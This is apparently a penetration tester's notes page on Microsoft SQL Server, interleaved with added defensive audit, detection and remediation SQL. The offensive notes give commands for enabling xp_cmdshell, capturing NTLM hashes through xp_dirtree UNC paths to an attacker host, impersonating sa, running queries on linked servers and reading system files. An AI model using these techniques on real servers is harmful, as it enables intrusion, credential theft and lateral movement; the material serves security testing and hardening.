MSSQL
Microsoft SQL Server (MSSQL) is a relational database management system developed by Microsoft. It's often used by developers when building .NET applications.
SQL Server Management Studio (SSMS) is a graphical client that can be installed along MSSQL or separately. It allows database administrators, developers, and other users to perform various tasks related to SQL Server databases.
MSSQL default ports: 1433 or 2433 (TCP) and 1434 (UDP).
Common commands:
select name from sys.databases; -- list databases
-- list databases, excluding the system ones
select name from sys.databases where name not in ('master', 'tempdb', 'model', 'msdb');
use db_name; -- select a database
-- list the tables in the database
select table_name from information_schema.tables where table_type = 'base table';
-- list the columns of the table "table_name_here"
select column_name, data_type from information_schema.columns where table_name = 'table_name_here';
-- list logins (1) and sysadmins (2)
SELECT name, password, sysadmin FROM syslogins;
SELECT name FROM sys.server_principals WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;
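Added example, not part of these notes: the same login information viewed from the DBA's side, as an audit script. It resolves sysadmin membership through sys.server_role_members (so disabled logins and Windows groups show up too) and flags SQL logins that weaken the attack surface the enumeration queries above expose. It assumes SQL Server 2012 or later; the login name in the remediation line is a placeholder.

```sql
-- Added example (not from the original notes): login hygiene audit.
-- Assumes SQL Server 2012+ for sys.sql_logins / sys.server_role_members.

-- 1. Members of sysadmin, including disabled logins and Windows groups.
SELECT m.name      AS member_name,
       m.type_desc AS member_type,   -- SQL_LOGIN, WINDOWS_LOGIN, WINDOWS_GROUP, ...
       m.is_disabled
FROM sys.server_role_members rm
JOIN sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.name;

-- 2. SQL-authenticated logins (passwords stored by the server) that are
--    enabled and either are the built-in sa (sid 0x01) or bypass the
--    Windows password policy / expiration checks.
SELECT l.name,
       l.is_disabled,
       l.is_policy_checked,
       l.is_expiration_checked,
       CASE WHEN l.sid = 0x01 THEN 'built-in sa' ELSE '' END AS note
FROM sys.sql_logins l
WHERE l.is_disabled = 0
  AND (l.sid = 0x01 OR l.is_policy_checked = 0 OR l.is_expiration_checked = 0)
ORDER BY l.name;

-- 3. Remediation for findings from query 2 (weak_login is a placeholder).
-- ALTER LOGIN sa DISABLE;
-- ALTER LOGIN [weak_login] WITH CHECK_POLICY = ON, CHECK_EXPIRATION = ON;
```

Query 2 is the one worth scheduling: a login that appears there is exactly what the syslogins/IS_SRVROLEMEMBER queries above would hand an attacker first.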
MSSQL Clients
Windows client: sqlcmd
On Windows, you can use the sqlcmd utility.
PS> # -E == Windows Auth | -Q == Query
PS> sqlcmd -E -Q "select name from sys.databases"
PS> sqlcmd -E -i query.sql
PS> sqlcmd -S server_name -U sa -P password [...]
If WMI (DCOM) is available, you can reach sqlcmd from a Linux host after popping a PowerShell shell:
$ impacket-wmiexec username:password@IP -shell-type powershell
Windows client: PowerUpSQL
On Windows, you can use PowerUpSQL (2.3k GitHub stars).
PS> Import-Module .\PowerUpSQL.ps1
PS> Get-SQLInstanceDomain
PS> Get-SQLQuery -Verbose -Instance "IP,1433" -username "example\username" -password "password" -query 'Select @@version'
Linux client: sqsh
You can use sqsh on Linux.
$ # -h == no headers/footers in the output
$ sqsh -S IP -U 'username' -P 'password' -h
$ sqsh -S IP -U '.\\username' -P 'password' -h
1> some query
2> go
Linux client: impacket
Alternatively, you can use impacket's mssqlclient.
$ impacket-mssqlclient username@IP -windows-auth
$ impacket-mssqlclient username:password@IP -windows-auth
The SQL Server might use Windows authentication or username/password authentication; add or omit -windows-auth accordingly.
MSSQL Pentester Notes
Enumeration
- We can use nmap to run scripts
$ nmap -sC -sV --script "*ms-sql*" -p 1433 IP
- Look for interesting Metasploit modules.
msf6> search mssql/
Foothold
- You can use Metasploit to XXX.
msf6> use mssql_enum_sql_logins
msf6> set RHOSTS IP
msf6> set USERNAME username
msf6> set PASSWORD password
msf6> set USE_WINDOWS_AUTHENT true
msf6> run
Exploitation - Part I
- xp_cmdshell can be used to run commands. It's disabled by default. The command runs with the same permissions as the SQL Server service account.
-- EXEC is optional when the call is the first statement of the batch
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
Note that you can use enable_xp_cmdshell in impacket-mssqlclient.
- We can steal hashes by setting up Responder and pointing the server at a UNC path:
EXEC master..xp_dirtree '\\IP\share\'
EXEC master..xp_subdirs '\\IP\share\'
- We may be able to impersonate logins:
-- list logins we can impersonate
SELECT DISTINCT b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
-- impersonate login 'sa'
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin');
REVERT; -- cancel impersonation
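Added example, not part of these notes, covering the three items above from the defender's side: an Extended Events session that records batches and RPC calls invoking xp_cmdshell or the UNC-path procedures used for hash capture (xp_dirtree, xp_subdirs, xp_fileexist), a query that reads what the session captured, and an audit of who holds IMPERSONATE on which login. The session name XE_DangerousXp, the path C:\XE\ and the logins in the REVOKE line are placeholders; SQL Server 2012 or later is assumed for the wildcard read of the event file.

```sql
-- Added example (not from the original notes): detection and permission review
-- for xp_cmdshell, xp_dirtree/xp_subdirs hash capture, and login impersonation.
-- Placeholders: session name XE_DangerousXp, path C:\XE\, logins in the REVOKE.

-- 1. Detection: capture any batch or RPC call that names a dangerous procedure,
--    with the login, client host and application that issued it.
CREATE EVENT SESSION [XE_DangerousXp] ON SERVER
ADD EVENT sqlserver.sql_batch_completed (
    ACTION (sqlserver.client_hostname, sqlserver.client_app_name,
            sqlserver.server_principal_name, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_cmdshell%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_dirtree%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_subdirs%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_fileexist%')
),
ADD EVENT sqlserver.rpc_completed (
    ACTION (sqlserver.client_hostname, sqlserver.client_app_name,
            sqlserver.server_principal_name, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_cmdshell%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_dirtree%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_subdirs%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_fileexist%')
)
ADD TARGET package0.event_file (SET filename = N'C:\XE\XE_DangerousXp.xel')
WITH (STARTUP_STATE = ON);

ALTER EVENT SESSION [XE_DangerousXp] ON SERVER STATE = START;

-- 2. Review the captured events: when, who, from where, which statement.
SELECT x.value('(event/@timestamp)[1]', 'datetime2')                                      AS event_time,
       x.value('(event/action[@name="server_principal_name"]/value)[1]', 'nvarchar(128)') AS login_name,
       x.value('(event/action[@name="client_hostname"]/value)[1]', 'nvarchar(128)')       AS client_host,
       x.value('(event/action[@name="client_app_name"]/value)[1]', 'nvarchar(128)')       AS client_app,
       x.value('(event/action[@name="sql_text"]/value)[1]', 'nvarchar(max)')              AS statement_text
FROM sys.fn_xe_file_target_read_file(N'C:\XE\XE_DangerousXp*.xel', NULL, NULL, NULL) AS f
CROSS APPLY (SELECT CAST(f.event_data AS XML)) AS e(x)
ORDER BY event_time DESC;

-- 3. Permission review: who may impersonate whom. For class 101
--    (SERVER_PRINCIPAL) major_id is the login being impersonated; a sysadmin
--    target means the grantee effectively is sysadmin.
SELECT grantee.name AS grantee_login,
       target.name  AS impersonated_login,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin,
       p.state_desc
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals target  ON target.principal_id  = p.major_id
WHERE p.class = 101
  AND p.permission_name = 'IMPERSONATE'
ORDER BY target_is_sysadmin DESC, grantee_login;

-- 4. Remediation for an unjustified grant found in query 3 (placeholder names).
-- REVOKE IMPERSONATE ON LOGIN::[sa] FROM [web_app_login];
```

The session filters on the statement text, so it also catches the procedures when they are called through EXEC('...') or from a job step; a dedicated SQL Server Audit on the same procedures is the heavier-weight alternative when the events must land in the Windows Security log.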
Exploitation - Part II
- Extended Stored Procedures
- CLR Assemblies
- SQL Server Agent Jobs
- External Scripts
- xp_regwrite can be used to create registry entries
- User Defined Functions in C/C++ (ex)
Lateral Movement
The current server may be linked to other servers. If we compromise it, we may be able to run SQL queries on linked servers.
- List Linked Servers
SELECT srvname, isremote FROM sysservers;
- Execute a SQL Query on a Linked Server (EXEC and EXECUTE are synonyms)
EXEC('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [your_target_here]
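Added example, not part of these notes: the linked-server review a DBA would run after reading the item above. It lists each link with the two options that decide what a compromised instance can do on the remote side (rpc out for EXEC ... AT, data access for OPENQUERY and four-part names), shows how local logins are mapped to remote credentials, and gives the statements that close the hole. The server name LinkedBox is a placeholder; the catalog views exist on SQL Server 2005 and later.

```sql
-- Added example (not from the original notes): linked-server audit.
-- LinkedBox is a placeholder name.

-- 1. Every linked server and the options that govern remote execution.
--    is_rpc_out_enabled = 1  -> EXEC ('...') AT [server] works
--    is_data_access_enabled  -> OPENQUERY / four-part names work
SELECT s.name,
       s.product,
       s.provider,
       s.data_source,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled
FROM sys.servers s
WHERE s.is_linked = 1            -- server_id 0 is this instance, skipped
ORDER BY s.name;

-- 2. Credential mapping per link. local_principal_id = 0 is the wildcard
--    mapping for all local logins; with uses_self_credential = 0 it means
--    every local user reaches the remote server as the fixed remote_name.
SELECT s.name AS linked_server,
       COALESCE(lp.name, '<all local logins>') AS local_login,
       ll.uses_self_credential,
       ll.remote_name
FROM sys.linked_logins ll
JOIN sys.servers s ON s.server_id = ll.server_id
LEFT JOIN sys.server_principals lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- 3. Remediation: turn off rpc out where it is not needed, and drop the
--    wildcard mapping (locallogin = NULL) to a privileged remote account.
-- EXEC sp_serveroption @server = N'LinkedBox', @optname = 'rpc out', @optvalue = 'false';
-- EXEC sp_droplinkedsrvlogin @rmtsrvname = N'LinkedBox', @locallogin = NULL;
```

A wildcard mapping to a remote sysadmin with rpc out enabled is the combination that turns one compromised instance into two; query 2 surfaces it directly.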
Additional Notes
- If installed, look for saved credentials in SSMS.
- The service often runs as NT SERVICE\MSSQLSERVER.
- By default, encryption is not enforced when attempting to connect.
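Added example, not part of these notes: two queries that verify the last two notes on a live instance instead of assuming the defaults. The first shows the account each SQL Server service runs as (sys.dm_server_services, SQL Server 2008 R2 SP1 and later, needs VIEW SERVER STATE); the second shows, per current connection, the authentication scheme and whether the session is actually encrypted.

```sql
-- Added example (not from the original notes): service account and
-- connection encryption check. Needs VIEW SERVER STATE.

-- 1. Which account each service runs as. NT SERVICE\MSSQLSERVER is the
--    default virtual account; LocalSystem or a domain admin is a finding.
SELECT servicename, service_account, startup_type_desc, status_desc
FROM sys.dm_server_services;

-- 2. Current network sessions, their auth scheme and encryption state.
--    encrypt_option = FALSE means query text and results cross the
--    network in clear (the login packet itself is always encrypted).
SELECT c.session_id,
       s.login_name,
       c.client_net_address,
       c.auth_scheme,      -- SQL, NTLM or KERBEROS
       c.encrypt_option,   -- TRUE / FALSE
       s.program_name
FROM sys.dm_exec_connections c
JOIN sys.dm_exec_sessions s ON s.session_id = c.session_id
WHERE c.net_transport <> 'Shared memory'
ORDER BY c.encrypt_option, c.client_net_address;
```

Encryption is not an sp_configure option: the fix is the Force Encryption setting (plus a proper certificate) in SQL Server Configuration Manager, after which query 2 should show TRUE on every TCP session.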
To-do
Stuff that I found, but never read/used yet.
- Try running the tool as administrator
- HeidiSQL, SQLPro, mssql-cli
- System databases
SELECT name FROM master.dbo.sysdatabases
SELECT table_name FROM xxx.INFORMATION_SCHEMA.TABLES
Write files
-- enable Ole Automation Procedures
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;
-- use it...
-- can read any file
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents;
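Added example, not part of these notes: a check-and-reset script for the sp_configure switches used in these notes (xp_cmdshell in Exploitation Part I, Ole Automation Procedures here) and the neighbouring ones that turn the engine into a code-execution host. One caveat worth knowing for the OPENROWSET line above: OPENROWSET(BULK ...) does not depend on Ole Automation Procedures; it needs the ADMINISTER BULK OPERATIONS server permission (sysadmin has it implicitly), so the script also lists who holds that explicitly.

```sql
-- Added example (not from the original notes): audit and reset of the
-- code-execution related sp_configure options.

-- 1. Current state of the risky options. value_in_use is the effective one;
--    value <> value_in_use means a change is pending RECONFIGURE.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options',
               'xp_cmdshell',
               'Ole Automation Procedures',
               'clr enabled',
               'Ad Hoc Distributed Queries',
               'external scripts enabled')
ORDER BY name;

-- 2. Explicit holders of the permission OPENROWSET(BULK ...) requires.
--    Members of sysadmin are not listed here but have it implicitly.
SELECT pr.name, pr.type_desc, pe.permission_name, pe.state_desc
FROM sys.server_permissions pe
JOIN sys.server_principals pr ON pr.principal_id = pe.grantee_principal_id
WHERE pe.permission_name = 'ADMINISTER BULK OPERATIONS';

-- 3. Reset. 'show advanced options' must be on to touch the others,
--    and is switched off again at the end.
EXEC sp_configure 'show advanced options', 1;      RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;                RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0;  RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;      RECONFIGURE;
```

Run query 1 again after the reset: every row except 'show advanced options' should report 0 in both columns, and a value that comes back to 1 without a change ticket is itself an indicator.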
SSMS
- File > New > Query with current connection
- Press Execute to run the file
- Need to add GO?